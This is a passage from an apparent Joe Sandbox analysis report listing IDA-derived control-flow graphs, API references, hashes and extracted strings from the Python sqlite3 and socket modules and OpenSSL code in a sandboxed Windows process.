                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485899265.00007FF8B8AF0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485937186.00007FF8B8B08000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485937186.00007FF8B8B0E000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2486071627.00007FF8B8B10000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2486115443.00007FF8B8B12000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff8b8af0000_Resource.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: 00007C6126
                                                                                                                                                                                                                                                              • String ID: Base Connection.__init__ not called.$Cannot operate on a closed database.$SQLite objects created in a thread can only be used in that same thread. The object was created in thread id %lu and this is thread id %lu.$You can only execute one statement at a time.$delete$insert$query string is too large$replace$sqlite3.Connection$the query contains a null character$update
                                                                                                                                                                                                                                                              • API String ID: 1558781965-3639599724
                                                                                                                                                                                                                                                              • Opcode ID: 2ca597ee9cf5982963c49dec3e510ab952d8cfe2c32dbb181abe08a7c94bb109
                                                                                                                                                                                                                                                              • Instruction ID: 88758f3b7eb5b918cdd259084e6a58651f05a4f749c90d4455db43af7c645ae7
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2ca597ee9cf5982963c49dec3e510ab952d8cfe2c32dbb181abe08a7c94bb109
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 57918321A0A64283FB608B29D8562792361EF44FC5F006535DB0ECB6A5DF3DE55BC30E
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • 00007FF8A89BC8C0.PYTHON311 ref: 00007FF8B8AF4A82
                                                                                                                                                                                                                                                              • 00007FF8A8806B10.SQLITE3 ref: 00007FF8B8AF4C2D
                                                                                                                                                                                                                                                              • 00007FF8A8806B10.SQLITE3 ref: 00007FF8B8AF4F8E
                                                                                                                                                                                                                                                                • Part of subcall function 00007FF8B8AF6DD0: 00007FF8C6126A30.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF8B8AF6EB3
                                                                                                                                                                                                                                                                • Part of subcall function 00007FF8B8AF6DD0: 00007FF8C6126A30.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF8B8AF6ECE
                                                                                                                                                                                                                                                                • Part of subcall function 00007FF8B8AF6DD0: 00007FF8C6126A30.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF8B8AF6EE5
                                                                                                                                                                                                                                                                • Part of subcall function 00007FF8B8AF6DD0: 00007FF8C6126A30.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF8B8AF6EFD
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2485937186.00007FF8B8AF1000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00007FF8B8AF0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485899265.00007FF8B8AF0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485937186.00007FF8B8B08000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485937186.00007FF8B8B0E000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2486071627.00007FF8B8B10000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2486115443.00007FF8B8B12000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff8b8af0000_Resource.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: 00007$C6126$A8806
                                                                                                                                                                                                                                                              • String ID: BEGIN $Base Connection.__init__ not called.$Base Cursor.__init__ not called.$Cannot operate on a closed cursor.$Cannot operate on a closed database.$Error while building row_cast_map$Recursive use of cursors not allowed.$SQLite objects created in a thread can only be used in that same thread. The object was created in thread id %lu and this is thread id %lu.$executemany() can only execute DML statements.
                                                                                                                                                                                                                                                              • API String ID: 4004158961-2731538448
                                                                                                                                                                                                                                                              • Opcode ID: 46f0396fcc794f300f6c3a0d81339de67e9a2b72a0c27424ac2496e31833a1f5
                                                                                                                                                                                                                                                              • Instruction ID: db83adedc431a547e2d6f30b1a6b40fa814deb0348be0cb17aded26ef78f0070
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 46f0396fcc794f300f6c3a0d81339de67e9a2b72a0c27424ac2496e31833a1f5
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5C525921A0BB0287EB549F29D48627823A5FF45BC4F142435CB0E877A4EF3DE496C74A

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                              control_flow_graph 1757 7ff8b7e5500c-7ff8b7e55046 1758 7ff8b7e55048-7ff8b7e55052 1757->1758 1759 7ff8b7e55054-7ff8b7e55079 call 7ff8b7e58338 1757->1759 1758->1759 1761 7ff8b7e55094-7ff8b7e550a2 1758->1761 1768 7ff8b7e550cf 1759->1768 1769 7ff8b7e5507b-7ff8b7e5507e 1759->1769 1762 7ff8b7e55278-7ff8b7e55288 call 7ff8b7e58510 1761->1762 1763 7ff8b7e550a8-7ff8b7e550b0 1761->1763 1779 7ff8b7e5528a-7ff8b7e55293 call 7ff8b7e58558 1762->1779 1780 7ff8b7e552b5-7ff8b7e552e4 call 7ff8b7e52f5c getsockname 1762->1780 1765 7ff8b7e550f6-7ff8b7e550ff 1763->1765 1766 7ff8b7e550b2-7ff8b7e550c9 call 7ff8b7e584a8 1763->1766 1774 7ff8b7e55107-7ff8b7e55158 1765->1774 1766->1768 1773 7ff8b7e550d4-7ff8b7e550f5 call 7ff8b7e52280 1768->1773 1770 7ff8b7e55084-7ff8b7e5508e 1769->1770 1771 7ff8b7e55350-7ff8b7e5538d call 7ff8b7e58538 1769->1771 1770->1761 1770->1771 1787 7ff8b7e5538f-7ff8b7e553ab WSASocketW 1771->1787 1788 7ff8b7e553ba-7ff8b7e553c0 socket 1771->1788 1774->1774 1778 7ff8b7e5515a-7ff8b7e551cd call 7ff8b7e58338 1774->1778 1778->1768 1796 7ff8b7e551d3-7ff8b7e55212 call 7ff8b7e58538 WSASocketW call 7ff8b7e58458 1778->1796 1779->1768 1791 7ff8b7e55299-7ff8b7e552b0 call 7ff8b7e584d8 1779->1791 1794 7ff8b7e552e6-7ff8b7e552e9 1780->1794 1795 7ff8b7e552f2-7ff8b7e552f5 1780->1795 1792 7ff8b7e553ad-7ff8b7e553b8 1787->1792 1793 7ff8b7e553c3-7ff8b7e553d0 call 7ff8b7e58458 1787->1793 1788->1793 1791->1768 1792->1788 1802 7ff8b7e55214-7ff8b7e55219 call 7ff8b7e54008 1793->1802 1813 7ff8b7e553d6-7ff8b7e553e0 1793->1813 1799 7ff8b7e5530c-7ff8b7e5530f 1794->1799 1800 7ff8b7e552eb-7ff8b7e552f0 1794->1800 1801 7ff8b7e552fb-7ff8b7e55306 WSAGetLastError 1795->1801 1795->1802 1796->1802 1819 7ff8b7e5521e-7ff8b7e5522c 1796->1819 1808 7ff8b7e55349-7ff8b7e5534b 1799->1808 1809 7ff8b7e55311-7ff8b7e5533f getsockopt 1799->1809 1800->1799 1801->1799 1801->1802 1802->1768 1811 7ff8b7e55233-7ff8b7e5525c 1808->1811 1809->1802 1814 7ff8b7e55345 1809->1814 1816 7ff8b7e5525e-7ff8b7e5526b call 7ff8b7e53cc4 1811->1816 1817 7ff8b7e55271-7ff8b7e55273 1811->1817 1813->1811 1818 7ff8b7e553e6-7ff8b7e553f8 SetHandleInformation 1813->1818 1814->1808 1816->1817 1824 7ff8b7e55406-7ff8b7e5540f closesocket 1816->1824 1817->1773 1818->1811 1821 7ff8b7e553fe-7ff8b7e55400 call 7ff8b7e58528 1818->1821 1819->1811 1821->1824 1824->1768
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2485660803.00007FF8B7E51000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B7E50000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485616376.00007FF8B7E50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485660803.00007FF8B7E60000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485660803.00007FF8B7E62000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485660803.00007FF8B7E65000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485822707.00007FF8B7E66000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485861999.00007FF8B7E68000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff8b7e50000_Resource.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Socket$ErrorHandleInformationLastclosesocketgetsocknamegetsockoptsocket
                                                                                                                                                                                                                                                              • String ID: Oiii$negative file descriptor$socket descriptor string has wrong size, should be %zu bytes.$socket.__new__
                                                                                                                                                                                                                                                              • API String ID: 3860486567-2881308447
                                                                                                                                                                                                                                                              • Opcode ID: b1c3a3ea00c3125276caac0fd55494debdefbed152b8eac7d43fe530445a96d7
                                                                                                                                                                                                                                                              • Instruction ID: 9417cd08d4fd2a54d1d42e9529be991126aec64be5a78ce345654b4d2dac1e2e
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b1c3a3ea00c3125276caac0fd55494debdefbed152b8eac7d43fe530445a96d7
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7DC13AA2A08B8982E7608B2D994426D73A1FF95BE8F105335DB6D526B1EF3CF584C740

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                              control_flow_graph 1825 7ff8b7e56650-7ff8b7e566f0 call 7ff8b7e584b0 1828 7ff8b7e569de 1825->1828 1829 7ff8b7e566f6-7ff8b7e56701 1825->1829 1832 7ff8b7e569e0-7ff8b7e56a02 call 7ff8b7e52280 1828->1832 1830 7ff8b7e56708-7ff8b7e56716 1829->1830 1831 7ff8b7e56703-7ff8b7e56706 1829->1831 1835 7ff8b7e56718-7ff8b7e5672e call 7ff8b7e585a8 1830->1835 1836 7ff8b7e5673a-7ff8b7e5673e 1830->1836 1834 7ff8b7e56751-7ff8b7e56760 1831->1834 1840 7ff8b7e567a8-7ff8b7e567b2 1834->1840 1841 7ff8b7e56762-7ff8b7e56770 call 7ff8b7e58318 1834->1841 1835->1828 1854 7ff8b7e56734-7ff8b7e56738 1835->1854 1837 7ff8b7e56744-7ff8b7e5674a call 7ff8b7e58560 1836->1837 1838 7ff8b7e569c7-7ff8b7e569d8 call 7ff8b7e584d8 1836->1838 1856 7ff8b7e5674d 1837->1856 1838->1828 1847 7ff8b7e567b4-7ff8b7e567c3 call 7ff8b7e58328 1840->1847 1848 7ff8b7e567d3-7ff8b7e567d7 1840->1848 1860 7ff8b7e56781-7ff8b7e567a6 call 7ff8b7e585a0 1841->1860 1861 7ff8b7e56772-7ff8b7e5677b call 7ff8b7e58558 1841->1861 1862 7ff8b7e567c9-7ff8b7e567d1 1847->1862 1863 7ff8b7e569a2-7ff8b7e569a5 1847->1863 1851 7ff8b7e567df-7ff8b7e567e6 1848->1851 1852 7ff8b7e567d9-7ff8b7e567dd 1848->1852 1858 7ff8b7e567ec 1851->1858 1859 7ff8b7e5698b-7ff8b7e5699c call 7ff8b7e584d8 1851->1859 1857 7ff8b7e567ef-7ff8b7e5681d call 7ff8b7e58338 1852->1857 1854->1856 1856->1834 1857->1828 1874 7ff8b7e56823-7ff8b7e5686d call 7ff8b7e58538 getaddrinfo call 7ff8b7e58458 1857->1874 1858->1857 1859->1863 1860->1857 1861->1860 1861->1863 1862->1857 1868 7ff8b7e569b6-7ff8b7e569bd 1863->1868 1869 7ff8b7e569a7-7ff8b7e569ab 1863->1869 1868->1828 1875 7ff8b7e569bf-7ff8b7e569c5 FreeAddrInfoW 1868->1875 1869->1868 1873 7ff8b7e569ad-7ff8b7e569b0 call 7ff8b7e58468 1869->1873 1873->1868 1880 7ff8b7e56873-7ff8b7e56875 1874->1880 1875->1828 1881 7ff8b7e56887-7ff8b7e56895 call 7ff8b7e58340 1880->1881 1882 7ff8b7e56877-7ff8b7e56882 call 7ff8b7e5403c 1880->1882 1881->1863 1887 7ff8b7e5689b-7ff8b7e568a2 1881->1887 1882->1863 1888 7ff8b7e568a8-7ff8b7e568bf call 7ff8b7e53ea0 1887->1888 1889 7ff8b7e56944-7ff8b7e56947 1887->1889 1897 7ff8b7e5697a-7ff8b7e5697e 1888->1897 1898 7ff8b7e568c5-7ff8b7e56900 call 7ff8b7e58578 1888->1898 1891 7ff8b7e56958-7ff8b7e5695f 1889->1891 1892 7ff8b7e56949-7ff8b7e5694d 1889->1892 1895 7ff8b7e56967-7ff8b7e5696a 1891->1895 1896 7ff8b7e56961 FreeAddrInfoW 1891->1896 1892->1891 1894 7ff8b7e5694f-7ff8b7e56952 call 7ff8b7e58468 1892->1894 1894->1891 1895->1832 1896->1895 1897->1863 1900 7ff8b7e56980-7ff8b7e56989 call 7ff8b7e58468 1897->1900 1905 7ff8b7e5690b-7ff8b7e5690e 1898->1905 1906 7ff8b7e56902-7ff8b7e56905 call 7ff8b7e58468 1898->1906 1900->1863 1905->1897 1908 7ff8b7e56910-7ff8b7e56927 call 7ff8b7e58368 1905->1908 1906->1905 1911 7ff8b7e5696c-7ff8b7e5696f 1908->1911 1912 7ff8b7e56929-7ff8b7e5692c 1908->1912 1911->1897 1915 7ff8b7e56971-7ff8b7e56974 call 7ff8b7e58468 1911->1915 1913 7ff8b7e5692e-7ff8b7e56931 call 7ff8b7e58468 1912->1913 1914 7ff8b7e56937-7ff8b7e5693e 1912->1914 1913->1914 1914->1888 1914->1889 1915->1897
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2485660803.00007FF8B7E51000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B7E50000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485616376.00007FF8B7E50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485660803.00007FF8B7E60000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485660803.00007FF8B7E62000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485660803.00007FF8B7E65000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485822707.00007FF8B7E66000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485861999.00007FF8B7E68000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff8b7e50000_Resource.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: AddrFreeInfo$getaddrinfo
                                                                                                                                                                                                                                                              • String ID: %ld$Int or String expected$OOiii$OO|iiii:getaddrinfo$getaddrinfo() argument 1 must be string or None$idna$iiisO$socket.getaddrinfo
                                                                                                                                                                                                                                                              • API String ID: 2288433384-3943835681
                                                                                                                                                                                                                                                              • Opcode ID: 8ec852737167a13786df1e3d18dd689f5ae79de5e7674d4188698fc6a662bfef
                                                                                                                                                                                                                                                              • Instruction ID: 9d488a00c8908519dc425b401446839b4d22a9cbe272e3d7c11042e99ff422b0
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8ec852737167a13786df1e3d18dd689f5ae79de5e7674d4188698fc6a662bfef
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 40B1D3B6B18B8A8AEB50CB69E4515BC23B1AF48FD8B044535DE4E67A68DF3CF445C300

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                              control_flow_graph 2187 7ff8b7e546bc-7ff8b7e546f0 2188 7ff8b7e546f3-7ff8b7e546f6 2187->2188 2189 7ff8b7e54708-7ff8b7e5470b 2188->2189 2190 7ff8b7e546f8-7ff8b7e54700 2188->2190 2193 7ff8b7e5470d-7ff8b7e54719 call 7ff8b7e583d0 2189->2193 2194 7ff8b7e5472f-7ff8b7e5473e call 7ff8b7e58428 2189->2194 2191 7ff8b7e54706 2190->2191 2192 7ff8b7e547a7-7ff8b7e547b5 call 7ff8b7e58538 2190->2192 2195 7ff8b7e54741 2191->2195 2240 7ff8b7e547b8 call 7ff8b7e55dbc 2192->2240 2241 7ff8b7e547b8 call 7ff8b7e557e4 2192->2241 2202 7ff8b7e54744-7ff8b7e5475c call 7ff8b7e53ba8 2193->2202 2204 7ff8b7e5471b-7ff8b7e5471e 2193->2204 2194->2195 2195->2202 2210 7ff8b7e5479e-7ff8b7e547a1 2202->2210 2211 7ff8b7e5475e-7ff8b7e54761 2202->2211 2206 7ff8b7e54838-7ff8b7e54849 call 7ff8b7e584d8 2204->2206 2207 7ff8b7e54724-7ff8b7e5472a 2204->2207 2213 7ff8b7e5484f 2206->2213 2207->2213 2208 7ff8b7e547bc-7ff8b7e547c9 call 7ff8b7e58458 2218 7ff8b7e54829-7ff8b7e5482c 2208->2218 2219 7ff8b7e547cb-7ff8b7e547ce 2208->2219 2210->2192 2210->2204 2215 7ff8b7e5476b-7ff8b7e54776 WSAGetLastError 2211->2215 2216 7ff8b7e54763-7ff8b7e54769 WSAGetLastError 2211->2216 2217 7ff8b7e54854-7ff8b7e54862 2213->2217 2220 7ff8b7e5477c-7ff8b7e54784 call 7ff8b7e583b8 2215->2220 2221 7ff8b7e54824-7ff8b7e54827 2215->2221 2216->2215 2222 7ff8b7e5482e 2218->2222 2223 7ff8b7e54834-7ff8b7e54836 2218->2223 2224 7ff8b7e547d8-7ff8b7e547e3 WSAGetLastError 2219->2224 2225 7ff8b7e547d0-7ff8b7e547d6 WSAGetLastError 2219->2225 2220->2188 2232 7ff8b7e5478a-7ff8b7e5478d 2220->2232 2221->2213 2222->2223 2223->2217 2228 7ff8b7e547e5-7ff8b7e547ed call 7ff8b7e583b8 2224->2228 2229 7ff8b7e547f1-7ff8b7e547f6 2224->2229 2225->2224 2228->2192 2238 7ff8b7e547ef 2228->2238 2233 7ff8b7e5481f-7ff8b7e54822 2229->2233 2234 7ff8b7e547f8-7ff8b7e54807 WSAGetLastError 2229->2234 2232->2213 2236 7ff8b7e54793-7ff8b7e54799 2232->2236 2233->2213 2233->2221 2234->2188 2237 7ff8b7e5480d-7ff8b7e54818 WSAGetLastError 2234->2237 2236->2213 2237->2233 2239 7ff8b7e5481a 2237->2239 2238->2232 2239->2188 2240->2208 2241->2208
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2485660803.00007FF8B7E51000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B7E50000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485616376.00007FF8B7E50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485660803.00007FF8B7E60000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485660803.00007FF8B7E62000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485660803.00007FF8B7E65000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485822707.00007FF8B7E66000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485861999.00007FF8B7E68000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff8b7e50000_Resource.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: ErrorLast$select
                                                                                                                                                                                                                                                              • String ID: timed out
                                                                                                                                                                                                                                                              • API String ID: 1043644060-3163636755
                                                                                                                                                                                                                                                              • Opcode ID: 9b587e6fefef49f4a190ddd4d8aaa406dedff62da5cbaec3ae030964e690f9dd
                                                                                                                                                                                                                                                              • Instruction ID: 146a8cc1782f64061ccd5596661d224bb03c0e81175011e47ab7dc1af9024708
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9b587e6fefef49f4a190ddd4d8aaa406dedff62da5cbaec3ae030964e690f9dd
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2B4169E1E09BCA86FB655B29A84623D2690BF46FE4F044130DF4D56AB4DF3CF8858620

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2485660803.00007FF8B7E51000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B7E50000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485616376.00007FF8B7E50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485660803.00007FF8B7E60000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485660803.00007FF8B7E62000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485660803.00007FF8B7E65000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485822707.00007FF8B7E66000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485861999.00007FF8B7E68000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff8b7e50000_Resource.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: setsockopt
                                                                                                                                                                                                                                                              • String ID: iiO!I:setsockopt$iii:setsockopt$iiy*:setsockopt$socket option is larger than %i bytes
                                                                                                                                                                                                                                                              • API String ID: 3981526788-1608436615
                                                                                                                                                                                                                                                              • Opcode ID: 02501267f43bcdad24a96284ff2875df11776b70c75b4fcfdc4710674496ea6e
                                                                                                                                                                                                                                                              • Instruction ID: 4d5d11d27419f60415405e0248726678e0c62015a9ab5f914ef60da3432bdd41
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 02501267f43bcdad24a96284ff2875df11776b70c75b4fcfdc4710674496ea6e
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F241DBB5618B8AD5EB208F55E8406AD7361FF88F94F504231DB9E43A64DF3CE549C700
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2484486391.00007FF8A92D1000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FF8A92D0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2484439323.00007FF8A92D0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2484486391.00007FF8A9353000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2484486391.00007FF8A9355000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2484486391.00007FF8A937D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2484486391.00007FF8A9388000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2484486391.00007FF8A9393000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2484884597.00007FF8A9397000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485026823.00007FF8A9398000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff8a92d0000_Resource.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: 00007C6126570
                                                                                                                                                                                                                                                              • String ID: ..\s\ssl\ssl_ciph.c$ALL:!COMPLEMENTOFDEFAULT:!eNULL$DEFAULT$ssl_create_cipher_list
                                                                                                                                                                                                                                                              • API String ID: 800424832-3764566645
                                                                                                                                                                                                                                                              • Opcode ID: 947104d63a21e440328ef0d344c3cd69064b2b7d42a54e3ce49041097fba2a28
                                                                                                                                                                                                                                                              • Instruction ID: ede97b1290da83805f42ba72046d842f24dab86cabac8e9fe71d4739e7c2c434
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 947104d63a21e440328ef0d344c3cd69064b2b7d42a54e3ce49041097fba2a28
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0E825C72A0EB85A1EA58CF49D4906B97BA0FB14BC4F188435DEAC8B758EF3DD941C740

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                              control_flow_graph 2921 7ff8a87def40-7ff8a87def8c 2922 7ff8a87def91-7ff8a87df004 2921->2922 2923 7ff8a87df006-7ff8a87df015 call 7ff8a87de980 2922->2923 2924 7ff8a87df02b-7ff8a87df03b call 7ff8a87dbfd0 2922->2924 2931 7ff8a87df5af-7ff8a87df5d2 call 7ff8a88fcad0 2923->2931 2932 7ff8a87df01b-7ff8a87df026 2923->2932 2929 7ff8a87df041-7ff8a87df06a 2924->2929 2930 7ff8a87df54a-7ff8a87df54d 2924->2930 2933 7ff8a87df070-7ff8a87df085 2929->2933 2934 7ff8a87df54f-7ff8a87df556 2930->2934 2935 7ff8a87df5aa 2930->2935 2932->2924 2943 7ff8a87df087-7ff8a87df093 2933->2943 2944 7ff8a87df0c2-7ff8a87df0cc 2933->2944 2937 7ff8a87df5a1 2934->2937 2938 7ff8a87df558-7ff8a87df562 2934->2938 2935->2931 2937->2935 2941 7ff8a87df564 2938->2941 2942 7ff8a87df56a-7ff8a87df597 2938->2942 2941->2942 2942->2935 2960 7ff8a87df599-7ff8a87df59f 2942->2960 2946 7ff8a87df0d6-7ff8a87df0f1 2943->2946 2953 7ff8a87df095-7ff8a87df09b 2943->2953 2944->2946 2947 7ff8a87df0ce-7ff8a87df0d0 2944->2947 2949 7ff8a87df0f3-7ff8a87df0f7 2946->2949 2950 7ff8a87df0f9-7ff8a87df102 2946->2950 2947->2946 2948 7ff8a87df318-7ff8a87df31f 2947->2948 2955 7ff8a87df321-7ff8a87df32b 2948->2955 2956 7ff8a87df36a 2948->2956 2952 7ff8a87df105-7ff8a87df119 call 7ff8a8891c90 2949->2952 2950->2952 2968 7ff8a87df136 2952->2968 2969 7ff8a87df11b-7ff8a87df134 call 7ff8a884a9f0 2952->2969 2958 7ff8a87df0a3-7ff8a87df0a6 2953->2958 2959 7ff8a87df09d-7ff8a87df0a1 2953->2959 2961 7ff8a87df333-7ff8a87df360 2955->2961 2962 7ff8a87df32d 2955->2962 2966 7ff8a87df373 2956->2966 2964 7ff8a87df0af-7ff8a87df0c0 2958->2964 2965 7ff8a87df0a8-7ff8a87df0ad 2958->2965 2959->2958 2959->2964 2960->2935 2970 7ff8a87df37a-7ff8a87df37d 2961->2970 2982 7ff8a87df362-7ff8a87df368 2961->2982 2962->2961 2964->2933 2965->2946 2965->2964 2966->2970 2973 7ff8a87df138-7ff8a87df15a 2968->2973 2969->2973 2974 7ff8a87df37f-7ff8a87df386 2970->2974 2975 